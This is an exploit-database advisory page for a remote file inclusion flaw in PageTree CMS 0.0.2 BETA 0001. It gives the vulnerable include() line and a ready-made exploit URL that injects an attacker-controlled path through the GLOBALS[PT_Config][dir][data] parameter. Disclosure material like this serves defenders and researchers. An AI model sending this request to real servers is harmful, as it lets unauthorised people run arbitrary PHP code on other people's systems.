header-logo
Suggest Exploit
vendor:
PageTree CMS
by:
NoGe
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: PageTree CMS
Affected Version From: 0.0.2 BETA 0001
Affected Version To: 0.0.2 BETA 0001
Patch Exists: NO
Related CWE: N/A
CPE: a:pagetreecms:pagetree_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PageTree CMS 0.0.2 BETA 0001 Remote File Inclusion Vulnerability

PageTree CMS version 0.0.2 BETA 0001 is vulnerable to a Remote File Inclusion vulnerability. This vulnerability exists due to insufficient sanitization of user-supplied input in the 'GLOBALS[PT_Config][dir][data]' parameter in the 'admin/plugins/Online_Users/main.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

=============================================================================================================


  [o] PageTree CMS 0.0.2 BETA 0001 Remote File Inclusion Vulnerability

       Software : PageTree CMS version 0.0.2 BETA 0001
       Vendor   : http://pagetreecms.co.cc/
       Download : http://pagetree.googlecode.com/svn/trunk/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


=============================================================================================================


  [o] Vulnerable file

       admin/plugins/Online_Users/main.php

        include($GLOBALS['PT_Config']['dir']['data']."content/1.php");



  [o] Exploit

       http://localhost/[path]/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=[evilcode]


=============================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic olibekas ulga Cungkee k1tk4t str0ke

       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]

        
=============================================================================================================

# milw0rm.com [2008-11-27]